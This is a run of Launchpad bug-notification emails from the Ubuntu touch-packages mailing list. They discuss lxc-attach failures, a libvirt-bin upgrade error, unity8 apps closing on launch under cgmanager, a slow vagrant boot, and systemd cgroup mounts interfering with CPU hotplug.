You do not show a 'lxc-start' command. You do need to manually start the container before you can attach to it. ** Changed in: lxc (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1611243 Title: lxc-attach "lxc-attach: attach.c: lxc_attach: 730 failed to get the init pid" Status in lxc package in Ubuntu: Invalid Bug description: This is what I did: 1. sudo lxc-create -t download -n itsnotfine -- --dist ubuntu --release xenial --arch amd64 2. sudo lxc-attach -n itsnotfine lxc-attach: attach.c: lxc_attach: 730 failed to get the init pid 3. Returns to command line prompt. I expected to be attached to the newly created container. dist version: Ubuntu 16.04.1 LTS package version: 2.0.3-0ubuntu1~ubuntu16.04.1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1611243/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1574566] Re: package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1
Indeed, that (-d) is a difference in how the upstart and systemctl jobs expect to function. The upstart job was 'expect daemon' and specifies -d in the upstart job itself (not in /etc/default/libvirt-bin) Assuming Ubuntu doesn't drop the upstart job altogether (which would be a problem for me) it might be good, during yakkety, to switch the upstart job to also not daemonizing libvirt. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1574566 Title: package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1 Status in libvirt package in Ubuntu: Invalid Status in systemd package in Ubuntu: Invalid Bug description: upgrade 15.10 -> 16.04 ProblemType: Package DistroRelease: Ubuntu 16.04 Package: libvirt-bin 1.3.1-1ubuntu10 ProcVersionSignature: Ubuntu 4.2.0-36.41-generic 4.2.8-ckt8 Uname: Linux 4.2.0-36-generic x86_64 ApportVersion: 2.20.1-0ubuntu2 Architecture: amd64 Date: Mon Apr 25 12:44:51 2016 ErrorMessage: subprocess installed post-installation script returned error exit status 1 InstallationDate: Installed on 2016-04-06 (19 days ago) InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021) ProcCmdline: BOOT_IMAGE=/vmlinuz-4.2.0-36-generic root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7 SourcePackage: libvirt Title: package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1 UpgradeStatus: Upgraded to xenial on 2016-04-25 (0 days ago) modified.conffile..etc.libvirt.qemu.networks.default.xml: [modified] mtime.conffile..etc.libvirt.qemu.networks.default.xml: 2016-04-14T14:20:45.067249 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1574566/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash
I'm sorry, I'm as context-swapped as you are... can you remind me why it is needed, versus simply having libpam-cgfs setup to give you cgroups upon login? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unity8 in Ubuntu. https://bugs.launchpad.net/bugs/1535058 Title: applications close instantly when launched from the launcher or dash Status in Canonical System Image: Confirmed Status in cgmanager package in Ubuntu: Incomplete Status in qtmir package in Ubuntu: Invalid Status in ubuntu-app-launch package in Ubuntu: Fix Released Status in unity8 package in Ubuntu: Invalid Status in unity8-desktop-session package in Ubuntu: Invalid Status in upstart package in Ubuntu: Invalid Bug description: xenial applications close instantly when launched from the launcher or dash but... if i launch the apps from a VT (for ex firefox using Xmir or gedit native --), the app loads ok. what close instantly means.. it opens the window and then it closes instantly in ~0.3s To manage notifications about this bug go to: https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash
Quoting David Planella (david.plane...@ubuntu.com): > In my case it's disabled, but even after enabling it manually, I'm > getting the same errors that I had a few months back: > > "cgmanager:do_create_main: pid 2118 (uid 1000 gid 1000) may not create > under /run/cgmanager/fs/freezer" This suggests that libpam-cgm is not installed or configured. Indeed, cgmanager should not allow you to create a cgroup in that directory, as that is the root freezer cgroup. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unity8 in Ubuntu. https://bugs.launchpad.net/bugs/1535058 Title: applications close instantly when launched from the launcher or dash Status in Canonical System Image: Confirmed Status in cgmanager package in Ubuntu: Incomplete Status in qtmir package in Ubuntu: Invalid Status in ubuntu-app-launch package in Ubuntu: Fix Released Status in unity8 package in Ubuntu: Invalid Status in unity8-desktop-session package in Ubuntu: Invalid Status in upstart package in Ubuntu: Invalid Bug description: xenial applications close instantly when launched from the launcher or dash but... if i launch the apps from a VT (for ex firefox using Xmir or gedit native --), the app loads ok. what close instantly means.. it opens the window and then it closes instantly in ~0.3s To manage notifications about this bug go to: https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash
Why is it being *dis*abled? it's not needed, but it's also not in the way. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unity8 in Ubuntu. https://bugs.launchpad.net/bugs/1535058 Title: applications close instantly when launched from the launcher or dash Status in Canonical System Image: Confirmed Status in cgmanager package in Ubuntu: Incomplete Status in qtmir package in Ubuntu: Invalid Status in ubuntu-app-launch package in Ubuntu: Fix Released Status in unity8 package in Ubuntu: Invalid Status in unity8-desktop-session package in Ubuntu: Invalid Status in upstart package in Ubuntu: Invalid Bug description: xenial applications close instantly when launched from the launcher or dash but... if i launch the apps from a VT (for ex firefox using Xmir or gedit native --), the app loads ok. what close instantly means.. it opens the window and then it closes instantly in ~0.3s To manage notifications about this bug go to: https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1598108] Re: ubuntu/xenial64 slow sstart
I'm confused as to why you reported this bug against lxc in ubuntu. Were you running vagrant+virtualbox inside an ubuntu lxc container? ** Package changed: lxc (Ubuntu) => cloud-images -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1598108 Title: ubuntu/xenial64 slow sstart Status in cloud-images: New Bug description: host system: mint 18, virtualbox 5.0.24-108355~Ubuntu~xenial, Vagrant 1.8.1 Steps to reproduce % vagrant init ubuntu/xenial64; vagrant up --provider virtualbox Expected behavior: system starts 5-7 seconds Current behavior: system starts about 90 seconds. most of the time system booting kernel. in the main directory appears a log file with boot log To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-images/+bug/1598108/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1392176] Re: mounts cgroups unconditionally which causes undesired effects with cpu hotplug
I recommend opening new bugs against libvirt and docker. Libvirt moves VMS into a cpuset by default. I assume docker does the same. (My xenial laptop runs upstart, so this is not systemd's doing) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1392176 Title: mounts cgroups unconditionally which causes undesired effects with cpu hotplug Status in cgmanager package in Ubuntu: Fix Released Status in linux package in Ubuntu: Fix Released Status in systemd package in Ubuntu: Fix Released Bug description: == Comment: #0 - Preeti U. Murthy- 2014-10-20 04:40:12 == ---Problem Description--- Systemd mounts cgroups explicitly every boot. Since the user had no say in it, undesired consequences are observed in reaction to cpu hotplug operations. Here is how. Systemd moves the tasks to the cgroup mounted by it. This cgroup automatically becomes the child of the root cgroup which is present by default. The children cgroups are not expected to remember their configured cpusets after hotplug operations in the kernel. Hence when cpus are taken offline and brought back online they are no longer used for load balancing of tasks and hence remain unused. This is an undesired consequence because the user had not even asked for cgroups to be mounted, yet is not able to use the full capacity of the system. Only when the user himself creates cgroup hierarchies, should he be exposed to the side effects of cpu hotplug on cpusets. Else all online cpus must be made available to him which is not happening since systemd mounts cgroups on every boot. Hence please revert this feature or provide an explaination as to why this is being done. ---uname output--- Linux tul181p1 3.16.0-18-generic #25-Ubuntu SMP Fri Sep 26 02:39:53 UTC 2014 ppc64le ppc64le ppc64le GNU/Linux Machine Type = Tuleta 8286-42A ---Debugger--- A debugger was configured, however the system did not enter into the debugger ---Steps to Reproduce--- $ taskset -p $$ $ 0-127 $ echo 0 > /sys/devices/system/cpu/cpu7/online $ taskset -p $$ $ 0-6,8-127 $ echo 1 > /sys/devices/system/cpu/cpu7/online $ taskset -p $$ $ 0-6,8-127 Userspace tool common name: systemd The userspace tool has the following bit modes: 64-bit Userspace rpm: systemd_208-8ubuntu8_ppc64el.deb Userspace tool obtained from project website: 208-8ubuntu8 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1392176/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1392176] Re: mounts cgroups unconditionally which causes undesired effects with cpu hotplug
"LXC cases, like docker and KVM" - did you mean non-lxc cases? xenial by default should now be using libpam-cgfs, should not be using cgmanager, and should not be creating cpusets. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1392176 Title: mounts cgroups unconditionally which causes undesired effects with cpu hotplug Status in cgmanager package in Ubuntu: Fix Released Status in linux package in Ubuntu: Fix Released Status in systemd package in Ubuntu: Fix Released Bug description: == Comment: #0 - Preeti U. Murthy- 2014-10-20 04:40:12 == ---Problem Description--- Systemd mounts cgroups explicitly every boot. Since the user had no say in it, undesired consequences are observed in reaction to cpu hotplug operations. Here is how. Systemd moves the tasks to the cgroup mounted by it. This cgroup automatically becomes the child of the root cgroup which is present by default. The children cgroups are not expected to remember their configured cpusets after hotplug operations in the kernel. Hence when cpus are taken offline and brought back online they are no longer used for load balancing of tasks and hence remain unused. This is an undesired consequence because the user had not even asked for cgroups to be mounted, yet is not able to use the full capacity of the system. Only when the user himself creates cgroup hierarchies, should he be exposed to the side effects of cpu hotplug on cpusets. Else all online cpus must be made available to him which is not happening since systemd mounts cgroups on every boot. Hence please revert this feature or provide an explaination as to why this is being done. ---uname output--- Linux tul181p1 3.16.0-18-generic #25-Ubuntu SMP Fri Sep 26 02:39:53 UTC 2014 ppc64le ppc64le ppc64le GNU/Linux Machine Type = Tuleta 8286-42A ---Debugger--- A debugger was configured, however the system did not enter into the debugger ---Steps to Reproduce--- $ taskset -p $$ $ 0-127 $ echo 0 > /sys/devices/system/cpu/cpu7/online $ taskset -p $$ $ 0-6,8-127 $ echo 1 > /sys/devices/system/cpu/cpu7/online $ taskset -p $$ $ 0-6,8-127 Userspace tool common name: systemd The userspace tool has the following bit modes: 64-bit Userspace rpm: systemd_208-8ubuntu8_ppc64el.deb Userspace tool obtained from project website: 208-8ubuntu8 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1392176/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp